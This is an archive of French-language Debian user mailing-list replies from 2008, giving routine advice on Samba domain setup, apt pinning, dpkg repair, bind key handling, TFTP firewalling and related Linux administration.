http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re : Installation SAMBA
Bonsoir, Voila, comme promis je livre un petit récapitulatif d'une configuration samba (PDC avec utilisateurs unix) http://www.dthconnex.com/samba.txt C'est un début :p! Il y a très certainement des erreurs mais cela à le mérite de fonctionner pas trop mal. Je le mettrais à jour au fur et à mesure, et sous forme html. Le but final est d'obtenir une configuration PDC et BDC avec annuaire LDAP. Donc si cela peut aider certains à garder des cheveux :p! --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Réparer un paquet cassé...
On Sat, 15 Mar 2008 12:35:46 +0100, David BERCOT [EMAIL PROTECTED] wrote: Bonjour, Bonjour, J'ai un petit problème sur une machine. Un paquet est cassé et je n'arrive pas à réparer mon système... Résultat de base : Préparation du remplacement de xxx_1.0 (en utilisant .../xxx_1.1_amd64.deb) ... invoke-rc.d: initscript xxx, action stop failed. dpkg : avertissement - ancien script pre-removal a retourné un code d'erreur de sortie 1 dpkg - tentative d'exécution du script du nouveau paquet à la place ... invoke-rc.d: initscript xxx, action stop failed. dpkg : erreur de traitement de /var/cache/apt/archives/xxx_1.1_amd64.deb (--unpack) : le sous-processus nouveau script pre-removal a retourné une erreur de sortie d'état 1 invoke-rc.d: initscript xxx, action start failed. dpkg : erreur lors du nettoyage : le sous-processus post-installation script a retourné une erreur de sortie d'état 1 Des erreurs ont été rencontrées pendant l'exécution : /var/cache/apt/archives/xxx_1.1_amd64.deb E: Sub-process /usr/bin/dpkg returned an error code (1) J'ai mis xxx car cela m'est déjà arrivé avec des paquets différents. Donc, j'essaye un apt-get install -f et le résultat est strictement identique. J'ai aussi essayé via synaptic et ça ne donne rien de plus. Vas dans le répertoire /var/lib/dpkg/info, tu y trouveras un fichier du type nom_paquet.prerm, tu le lances, tu vois les erreurs générées et tu modifies le fichier en conséquence. Bon l'erreur semble venir de l'activation/désactivation d'un service comme le dit le message de sortie de dpkg. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: iptables et redirection (niveau débutant)
On Sat, 15 Mar 2008 15:31:05 +0400, Frédéric Moinard [EMAIL PROTECTED] wrote: Bonjour, Bonjour, Pour un réseau domestique, avec des enfants grandissants dedans, et une passerelle sur laquelle marchent dansguardian et squidguard (sur les ports par défaut), avec un firewall qui dit entre autres (tout copié sur internet): [...] La question: peut-on définir une règle qui permette de passer directement, en évitant dansguardian et squidguard ? Il faudrait, je pense préciser dans un premier temps quelles sont les conditions pour ne pas passer pas le proxy (ordinateur, identitié, port) ? --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: SAMBA PDC - une lueur d'espoir !
Bonjour, On Sat, 15 Mar 2008 11:57:47 +0100 (CET), Jean-Michel Caricand [EMAIL PROTECTED] wrote: Bonne espoir ! [...] -- Voila une coupe franche d'un mail De mon côté ma configuration est fonctionnelle, il me reste à faire une passe pour faire le grand ménage et mettre mes affaires comme je veux et je pourrais sortir une configuration de base. Donc si tu n'as toujours pas de solution d'ici dimanche soir ou lundi je posterais un lien sur la liste. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Pinning d'apt...je m'y perds
On Sat, 15 Mar 2008 17:49:47 +0100, giggz [EMAIL PROTECTED] wrote: Bonjour, Bonsoir, [...] Je souhaiterai régler la valeur Pin-Priority au mieux. J'ai lu le man apt_preferences et je n'ai pas bien compris. Comment apt connait il la distribution par défaut ? moi c'est unstable, mais comment le sait il ? Avec une valuer de 150 ça a l'air de fonctionner...mais je ne veux pas avoir de mauvaises surprises, donc je demande ici. Par défaut les paquets se voit attribuer une priorité de 500. Il n'y a aucun distribution par défaut de définie : $ zless /usr/share/doc/apt/examples/configure-index.gz | grep -i release Default-Release ; et la sortie de la commande apt-config dump ne le mentionne pas non plus. Si tu veux attribuer une priorité supérieure à unstable par exemple : echo APT::Default-Release unstable; /etc/apt/apt.conf.d/00maconfig du coup : # apt-config dump | grep -i release APT::Default-Release unstable; et les paquets en unstable se voit attribuer une priorité de 990 et plus de 500. Ce qui peut-être démontrer par la commande apt-cache policy Si tu veux vérifier la priorité pour acroread tu fais un simple : # apt-cache policy acroread En espérant que cela soit suffisant pour te dépanner. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Pinning d'apt...je m'y perds
[...] Je souhaiterai régler la valeur Pin-Priority au mieux. J'ai lu le man apt_preferences et je n'ai pas bien compris. Comment apt connait il la distribution par défaut ? moi c'est unstable, mais comment le sait il ? Avec une valuer de 150 ça a l'air de fonctionner...mais je ne veux pas avoir de mauvaises surprises, donc je demande ici. Par défaut les paquets se voit attribuer une priorité de 500. Il n'y a aucun distribution par défaut de définie : $ zless /usr/share/doc/apt/examples/configure-index.gz | grep -i release Default-Release ; et la sortie de la commande apt-config dump ne le mentionne pas non plus. Si tu veux attribuer une priorité supérieure à unstable par exemple : echo APT::Default-Release unstable; /etc/apt/apt.conf.d/00maconfig [...] le fichier /etc/apt/preferences est tjs d'actualité ? ou alors il faut créer un fichier dans /etc/apt/apt.conf.d/ ? La manipulation de Defaut-Release via les options de configuration de apt (apt.conf), n'est là que pour répondre à quelle est la distribution par défaut ? et comment apt fait. Le fichier preferences reste d'actualité je pense car ensuite il est facile de manipuler les priorités sur les dépôts, en fonction des versions de packages. [quote] J'ai installé mplayer, ffmpeg entre autres. Je veux garder la version officielle de ces paquets. Mais j'ai aussi acroread d'installé et je veux qu'il soit mis à jour. [/quote] En sid moi j'aurais mis le dépôt multimedia à la priorité max, et la distribution instable ensuite afin de garantir que le multimedia ne soit pas gêné par l'arrivée des nouveaux paquets. Quelque chose de ce goût là. Autrement il y a des exemple ici si tu veux : http://forum.debian-fr.org/viewtopic.php?f=8t=5659 Cela répond t-il à ta question ? Autrement il va falloir me réexpliquer ce que tu veux :p! --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Re : Installation SAMBA
Bonjour, # cat passwd | mksmbpasswd.sh smbpasswd -bash: mksmbpasswd.sh: command not found # which mksmbpasswd /usr/sbin/mksmbpasswd [...] J'ai l'impression que tu souhaites créer un domaine microsoft avec Samba. Pour cela il faut intégrer les machines dans le domaine (via les propriété système du Win). Mais avant tout, il faut (au moins): - créer un utilisateur unix qui porte le nom de la machine (avec un $ à la fin je crois, à vérifier) - créer un utilisateur samba de cette même machine (avec l'option -m de smbpasswd) - créer un compte root sur samba qu'il faudra donné lors de l'intégration de la machine (ensuite tu pourras le désactiver). Ensuite, dans ton logon.bat (qui devrait être dans /home/netlogon et non /home/netlogon/bureau), tu peux rajouter des net use x: \\serveur1\maison, pour créer les lecteurs réseaux En premier on crée un répertoire pour les utilisateurs samba par exemple afin de contenir leur répertoires personnels et profils : # mkdir /home/dom_users On peut créer un groupe pour ces utilisateurs : # groupadd dom_users Ensuite, on crée un utilisateur spécifique samba sans droit sur la serveur, et on lui ajoute une entrée samba : # mkdir /home/dom_users/user_1 # useradd -m -d /home/dom_users/user_1 -s /bin/false -G dom_users # smbpasswd -a user_1 Idem pour le user 2 On ajoute un groupe pour les machines de confiance sur le réseau # groupadd dom_pcs Maintenant, il faut ajouter le __trust account__ pour la machine : # useradd -s /bin/false -g dom_pcs computer_name$ # smbpasswd -am computer_name$ Les comptes sont à présents crées, mais il faut avoir un utilisateur qui permettent depuis les machines de les ajouter au domaine. Hop, on prend root :(! et on lui ajoute un password samba : # smbpasswd -a root En admettant que ta configuration samba et les scripts de démarrage fonctionnent. On passe à l'étape suivante ; ajout des machines au domaine. Sur un poste Xp, click droit sur poste de travail Propriété Nom de l'Ordinateur Id Réseau et tu entres les données correspondantes à ton réseau. J'ai monté un vite fait avec utilisateurs unix, mais j'ai un pb pour ajouter mes machines au domaine. Mais bon, l'idée est là car j'ai fait la même chose l'autre jour au boulot en catastrophe et j'ai inscrit une quinzaine de postes de cette manière. Bon, si l'inscription au domaine fonctionne, alors tu devrais pouvoir t'authentifier sur le domaine. Au pire tu peux parcourir tes partages depuis ton explorateur windows en fournissant l'addresse ip de ton serveur et en te logguant sur le domaine. Après si tu veux créer des groupes pour tes utilisateurs et associer des droits aux groupes pour certains partages, il te suffit de définir une write list : write list = @be, @direction Tant que j'y pense, pour le debug ajoute la directive _log level = 5_ dans ton fichier smb.conf. J'espère que cela t'aidera un peu. Je te fournirais ma config une fois que j'aurais trouvé d'ou vient mon problème. Je vais tenter l'installation sur une autre machine pour voir. (pas tout de suite) Après je ne suis pas admin, donc si il y en a un dans l'audience. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Reinstallation
On Fri, 14 Mar 2008 09:21:19 + (UTC), didier gaumet [EMAIL PROTECTED] wrote: On Fri, 14 Mar 2008 08:43:46 +0100, Samuel SALSON wrote: comment tu fais ca ? (dhcp ,tftp ) comme ça: http://www.debian.fr/releases/stable/i386/ch04s06.html.fr De plus si tu as un firewall, en plus des règles standards, il te faut ajouter le port 69 pour le protocole UDP et y ajouter l'helper nf_conntrack_tftp ou ip_conntrack_tftp suivant la version de ton noyau, afin d'assurer le suivi de connexion. http://tools.ietf.org/html/rfc1350 --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Reinstallation
| J'ai une bonne vieille Debian sarge qui est installée sur un PC en | double boot depuis un bon moment. | Je voudrais réinstaller par dessus tout ça une etch toute neuve, en | supprimant cette sarge et ce W98 pour profiter de tout le disque dur. | La difficulté réside dans le fait que je n'ai pas de CD-ROM sous la | main, et que mon PC plus récent ne dispose pas, lui, de lecteur disquette. | La question est donc : connaissez vous une méthode d'installation depuis | une debian fonctionnelle qui permette d'écraser toute installation | précédente ? En utilisant debootstrap : http://www.debian.org/releases/stable/i386/apds03.html.fr Pour ma part, j'indique via dhcp aux machines clientes bootant sur leur carte réseau où se situe mon serveur tftp avec l'image debian. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: /var/mail/user ne se vide pas.
On Mon, 10 Mar 2008 16:50:46 +0100, Frédéric LAURENT [EMAIL PROTECTED] wrote: Bonjour à tous et à toutes, Bonjour, J'ai postfix qui tourne sur ma debian testing et je viens de m'apercevoir que malgré le fait que je supprime mes messages au fur et à mesure dans mon client mail(thunderbird sur un poste XP), les messages ne s'effacent pas dans /var/mail/user .Je consulte mes messages en imap. Je me retrouve avec un /var/mail/user de 4 Mo. Normalement, si je ne dis pas de bêtises, la suppression des messages sous thunderbird passe par un compactage des dossiers. Essayes en local sur la machine avec un __mutt -f .__ dans la boîte mails. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: APT::Authentication et sources locales
On Mon, 10 Mar 2008 15:15:39 +0100, Sébastien NOBILI [EMAIL PROTECTED] wrote: Bonjour, Bonsoir, Pour accélérer les phases d'installation de paquets, j'ai monté les images ISO de Debian en loop sur mon système. [...] Comment indiquer à APT de faire confiance aux sources locales ? Je ne veux pas outrepasser la vérification (APT::Get::AllowUnauthenticated) mais simplement lui indiquer que ce qui est en local est digne de confiance. Intéressante question ! Mais je n'ai pas pour le moment la réponse :p! Cependant, je ne comprends pas pourquoi tu n'installes pas le keyring puisque 'il doit se trouver sur l'ISO ? Soit avec le package _debian-archive-keyring_ ou via la commande : # /usr/bin/apt-key add ma_clef.gpg si tu arrives à la récupérer ailleurs que dans le paquet lui-même. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [Resolu]: /var/mail/user ne se vide pas.
On Mon, 10 Mar 2008 17:13:03 +0100, Frédéric LAURENT [EMAIL PROTECTED] wrote: [...] Bien que dire, merci beaucoup En effet, j'ai compacté le dossier... çà a fait du vide. Merci pour la lumière. ;) Je ne me rappelais plus de la commande employée sur le serveur IMAP ; donc j'ai fait une petite recherche : suppression thunderbird = positonnement du flag delete sur le message compactage = suppression réelle via la commande EXPUNGE. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Ghostscript cassé après aptitude upgrade
On Mon, 10 Mar 2008 19:44:51 +0100, Guillaume Yziquel [EMAIL PROTECTED] wrote: Bonsoir. Bonsoir, J'ai fait un aptitude upgrade il n'y a pas très longtemps. Et depuis, Ghostscript ne marche plus... Le message d'erreur après une tentative d'utilisation de pdf2ps: GPL Ghostscript 8.61: Can't find initialization file gs_init.ps. [...] Search path: . : /usr/share/ghostscript/8.61/lib : /usr/share/ghostscript/8.61/Resource : /usr/share/ghostscript/fonts : /var/lib/defoma/gs.d/dirs/fonts : /usr/share/cups/fonts : /usr/share/ghostscript/fonts : /usr/local/lib/ghostscript/fonts : /usr/share/fonts : /usr/share/fonts/type1/gsfonts For more information, see /usr/share/doc/ghostscript/Use.htm. Please report bugs to bugs.ghostscript.com. et un locate gs_init.ps donne /usr/share/ghostscript/8.62/lib/gs_init.ps [...] j'ai bien compris que postscript ne sait pas où trouver gs_init.ps, mais j'aimerais bien savoir où est-ce que ghostscript lit le chemin d'accès à gs_init.ps. As tu regardé du côté des variables d'environnement GS_LIB=/usr/share/ghostscript/8.62/lib gs ... A priori l'utilisation de l'option -I pour spécifier un chemin pourrait aussi sembler une bonne idée. Après je sèche ! --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Re : configuration dns ...
On Mon, 10 Mar 2008 14:43:26 + (GMT), anne sophie lantz [EMAIL PROTECTED] wrote: Coucou, Bonjour, merci pour toutes vos réponses, et c'est vrai que bind n'est pas simple à configurer. et d'ailleurs, bind est indiqué failed ! et ne démarre pas. Je voudrais installer samba. est-ce nécessaire d'installer bind pour samba ? Tu abandonnes bien vite ! Bind fonctionne correctement mais il faut il passer un peu de temps pour le mettre en place et comprendre comment cela fonctionne, comme l'on déjà mentionné les autres. Tu nous indiques un failed mais aucun message d'erreur, alors comment t'aider ? Tu veux déja mettre en place un samba, mais il faudrait préciser quelle configuration tu veux mettre en place (un partage tout simple, un PCD, BDC ..) ; La aussi ce n'est pas une solution clef en main. Il y a de la lecture à faire. Donc moi je dirais qu'avant de mettre un serveur samba, il serait bon de se faire la main avec un serveur dhcp, puis un serveur dns, un serveur ftp ... On commence par des configurations simples et on étoffe ensuite. Cela permet de se familiariser avec la Debian au passage. Pour ma part le but du jeu ce n'est pas d'installer des services en deux minutes et que ce soit la grosse nébuleuse autour. Donc si tu as des questions plus précises, n'hésites pas ! --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: configuration dns ...
Bonjour, On Sat, 8 Mar 2008 15:27:25 +0100, BOUIDA Djelloul [EMAIL PROTECTED] wrote: Selon anne sophie lantz [EMAIL PROTECTED]: J'essaie de configurer mon dns. La commande rndc est configurée à l'aide du fichier /etc/rndc.conf. Utiliser la commande rndc-confgen pour générer automatiquement ce fichier. [...] Il faut alors copier la valeur du paramètre secret (SOPQFpR3H1Lk0xHh3EgFsg== dans l'exemple) dans le fichier /etc/named.conf dans la partie : [...] On peut aussi la créer manuellement : #dnssec-keygen -a HMAC-MD5 -b 512 -n USER ns-example-com-rndc-key Par contre quant à faire un copier/coller de la clef dans le fichier de configuration de bind qui est __world-readable__, je préfère utiliser un include pour charger ma clef appartenant à root:bind en 640; c'est à mon avis une méthode plus sûre, et plus modulaire. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Priorités sur l'installation des paquets
On Wed, 5 Mar 2008 13:13:38 +0100, Sylvain Sauvage [EMAIL PROTECTED] wrote: Guy Roussin, mercredi 5 mars 2008, 12:12:22 CET Finalement cette méthode (apt-build) n'est pas satisfaisante dans mon cas. Notamment pour les paquets qui ont besoin d'être recompilés sans changement des sources, uniquement du fait d'un paquet dépendant (qui lui a été recompilés car patché). Peux-on modifier, simplement, le numéro de version d'un paquet recompilé ? Ajouter une entrée dans debian/changelog. Utilises la commande dch ; cela impacte le changelog et modifie le nom du répertoire en fonction du numéro de version. Après tu recompiles et le tour est joué. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Connaître le nom du paquet source
On Wed, 5 Mar 2008 13:23:13 +0100, Sylvain Sauvage [EMAIL PROTECTED] wrote: Guy Roussin, mercredi 5 mars 2008, 12:17:50 CET Bonjour (je ne l'ai pas dit la première fois :p!) [...] En revanche, pour le dépôt, je ne crois pas qu’il y ait de traçage. Même pas dans les logs de aptitude. Tout ce qu’on peut savoir, c’est dans quel dépôt on irait le chercher si on l’installait maintenant… L'utilisation de apt-cache policy [nom_du_paquet] doit pouvoir aider je pense. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Dpkg-deb
On Wed, 05 Mar 2008 16:11:59 +0100, Guillaume MESSONNIER [EMAIL PROTECTED] wrote: Le Wed, Mar 05, 2008 at 11:28:14PM +0900, Charles Plessy a écrit : Le Wed, Mar 05, 2008 at 03:01:06PM +0100, Guillaume MESSONNIER a écrit [...] Merci de cette infos, j'avais zappé ce détail... Donc pas de champ Uploaders dans mes paquets finaux! Le but de la manip était de faire apparaître dans le paquet tous les mainteneurs des applis! Quel est la bonne manière de le faire ? Indiquer dans le champ maintainer une team avec un mail redirigé à tous les mainteneurs (Je crois que me souvenir qu'il ne faut pas indiquer plusieurs mainteneurs dans le champ maintainer) ? Je pencherais pour un fichier CREDITS spécifique à chaque application. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Connaître le nom du paquet source
On Wed, 5 Mar 2008 13:55:24 +0100, Sylvain Sauvage [EMAIL PROTECTED] wrote: Franck JONCOURT, mercredi 5 mars 2008, 13:33:14 CET […] Comme je le disais, ça ne donne que « dans quel dépôt… ». Je pense que Guy veut savoir d’où vient un paquet déjà installé (notamment pour savoir si c’est celui qu’il a recompilé ou pas). Il faudrait préciser un peu plus ce qui est recherché car pour moi un paquet est associé à un identifiant unique : -- nom du paquet + numéro de version que se soit un paquet officiel ou un paquet fait maison. Donc à partir du moment où le paquet est trouvé dans un dépôt c'est forcément le bon. Je pense que j'ai certainement manqué quelque chose :p! mais si l'OP pouvais préciser. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: dupliquer base de données paquets sur autre ma chine
On Wed, 05 Mar 2008 20:39:27 +0100, [EMAIL PROTECTED] wrote: Bonjour à tous Bonjour, Je cherche un outil pour dupliquer la base de données de dpkg sur une autre machine et ainsi pouvoir installer les mêmes paquets. J'avais découvert ça dans un passé lointain. Impossible maintenant de retrouver le nom de l'utilitaire. Merci pour toute info. dpkg --get-selection ma_config dpkg --set-selection ma_config Je n'ai pas de machine pour vérifier ma syntaxe, donc cf la man page. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Récupérer l'ip du client qui se con necte
On Sat, 1 Mar 2008 12:27:31 +0100, Patrice OLIVER [EMAIL PROTECTED] wrote: Le 29/02/08, Sylvain Sauvage[EMAIL PROTECTED] a écrit : [...] Justement, si tu mets TERM=xterm dans le .bashrc (ou .kshrc, ou autre, hein, on n'est pas sectaire) du serveur, celui-ci sera exécuté sur le serveur à la connexion, donc TERM vaudra xterm dans le shell du telnet et donc pour les applis lancées dans le telnet. [...] Le problème est que nous avons différents types de clients qui se connectent sur ledit serveur, dont des clients windows et des clients linux. Mes clients linux sont dans un range d'IP déterminé. C'est peut-être tout bête mais on moins j'aurais la réponse :p! Cela change quoi que ce soit un client windows ou linux et qu'on lui affecte un émulateur de shell de type xterm ? Merci. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [HS] Publication/Edition de fichier de configuration
On Wed, 20 Feb 2008 11:23:55 +0100, Yves Rutschle [EMAIL PROTECTED] wrote: On Tue, Feb 19, 2008 at 10:09:30PM +0100, Stephane Bortzmeyer wrote: le rendre éditable par l'utilisateur. Pas de solution simple (bref, il faut programmer). C'est pas non plus la mer à boire, voici une solution complète: [...] Il faut que je creuse côté perl pour voire un peu plus la chose, mais en tout cas c'est efficace. Je garde quand même le lien à Stéphane que j'ai rapidement survolé mais qui me semble aussi intéressant. Maintenant je n'ai plus qu'à m'amuser un peu :p! --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.net/?DebianFrench Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]